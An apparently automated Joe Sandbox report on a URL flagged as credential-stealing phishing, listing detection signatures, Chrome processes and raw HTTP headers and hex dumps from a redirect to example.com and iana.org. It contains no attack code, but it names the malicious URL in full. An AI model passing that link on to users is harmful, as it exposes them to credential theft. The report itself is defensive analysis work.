Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://or4t.iednationusa.com/sYyRdjOU

Overview

General Information

Sample URL:https://or4t.iednationusa.com/sYyRdjOU
Analysis ID:1530644
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected suspicious crossdomain redirect
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 2080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,10250477170695779646,1042242611913617245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://or4t.iednationusa.com/sYyRdjOU" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://or4t.iednationusa.com/sYyRdjOUSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://www.example.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49813 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: or4t.iednationusa.com to https://www.example.com
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49813 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:50:02 GMTServer: ApacheX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Wed, 06 Mar 2024 16:51:21 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-originCache-Control: public, max-age=3600Expires: Thu, 10 Oct 2024 08:50:02 GMTContent-Encoding: gzipContent-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;Age: 1629Content-Length: 1508Keep-Alive: timeout=2, max=358Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 58 cd 6e dc 36 10 3e 57 4f c1 e8 d0 93 b5 b2 b7 a8 53 34 5a 01 0b 27 41 0c 14 0b c3 75 10 a0 97 80 a2 66 57 74 28 51 21 a9 dd 6c 4f 7d 8d be 5e 9f a4 33 a4 b4 ff b1 e3 06 68 62 c0 2b 72 c4 f9 e1 37 c3 99 a1 a2 ec 59 a9 85 5b b7 c0 2a 57 ab 3c ca 86 07 f0 32 8f 7e c8 9c 74 0a f2 57 9f 78 dd 2a 60 2f 75 cd 65 63 b3 34 90 23 5c 50 83 e3 4c 54 dc 58 70 93 b8 73 f3 e4 97 98 a5 f9 f0 a6 72 ae 4d e0 63 27 97 93 f8 4a 37 0e 1a 97 90 ba 98 89 Data Ascii: Xn6>WOS4Z'AufWt(Q!lO}^3hb+r7Y[*W<2~tWx*`/uec4#\PLTXpsrMc'J7
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 08:11:33 GMTServer: ApacheVary: Accept-EncodingX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-originExpires: Thu, 10 Oct 2024 09:51:17 GMTX-Content-Type-Options: nosniffAge: 1573Content-Encoding: gzipCache-Control: public, max-age=21603Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;Content-Length: 2865Keep-Alive: timeout=2, max=358Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 5a ef 6e 1b b9 11 ff 1c 3d 05 6f 7b 08 6c 20 ab b5 1c db 71 2e b2 00 9f ed 34 46 71 8e 61 3b 28 d0 2f 06 b5 4b 49 4c b8 cb 0d c9 95 ad 16 05 fa 1a 7d bd 3e 49 67 48 ee 6a 25 ad 64 e9 20 a5 bd 20 b0 b8 fc 33 43 fe 66 38 1c 0e a7 fb 53 22 63 33 c9 19 19 99 54 f4 5a dd f2 87 d1 a4 d7 7a d5 35 dc 08 d6 6b 9f df dd 9e 93 4b 99 52 9e 75 23 57 d7 82 d6 94 19 4a e2 11 55 9a 99 b3 a0 30 83 f0 34 20 51 af 6c 19 19 93 87 ec 7b c1 c7 67 c1 85 cc 0c cb 4c 88 bc 02 12 bb af b3 c0 b0 67 13 21 cf 0f 15 9d 05 32 19 4d d9 59 30 e6 ec 29 97 ca d4 06 3f f1 c4 8c ce 12 36 e6 31 0b ed c7 Data Ascii: Zn=o{l q.4Fqa;(/KIL}>IgHj%d 3Cf8S"c3TZz5kKRu#WJU04 Ql{gLg!2MY0)?61
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:17 GMTServer: ApacheX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Sun, 18 Jul 2021 22:53:48 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-originCache-Control: public, max-age=3600Expires: Thu, 10 Oct 2024 08:29:17 GMTContent-Encoding: gzipContent-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;Age: 2909Content-Length: 2193Keep-Alive: timeout=2, max=358Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6 Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:17 GMTServer: ApacheX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Sun, 18 Jul 2021 22:53:48 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-originCache-Control: public, max-age=3600Expires: Thu, 10 Oct 2024 08:29:17 GMTContent-Encoding: gzipContent-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;Age: 2909Content-Length: 2193Keep-Alive: timeout=2, max=358Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6 Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:17 GMTServer: ApacheX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Sun, 18 Jul 2021 22:53:48 GMTX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-originCache-Control: public, max-age=3600Expires: Thu, 10 Oct 2024 08:29:17 GMTContent-Encoding: gzipContent-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;Age: 2909Content-Length: 2193Keep-Alive: timeout=2, max=358Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6 Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ
Source: global trafficHTTP traffic detected: GET /sYyRdjOU HTTP/1.1Host: or4t.iednationusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.example.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.example.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.example.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /domains/example HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_css/2022/iana_website.css HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_js/jquery.js HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_js/iana.js HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/iana-logo-header.svg HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_js/iana.js HTTP/1.1Host: www.iana.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_js/jquery.js HTTP/1.1Host: www.iana.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/iana-logo-header.svg HTTP/1.1Host: www.iana.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/bookmark_icon.ico HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/bookmark_icon.ico HTTP/1.1Host: www.iana.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/SourceCodePro-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1Host: www.iana.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://www.iana.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.iana.org/_css/2022/iana_website.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
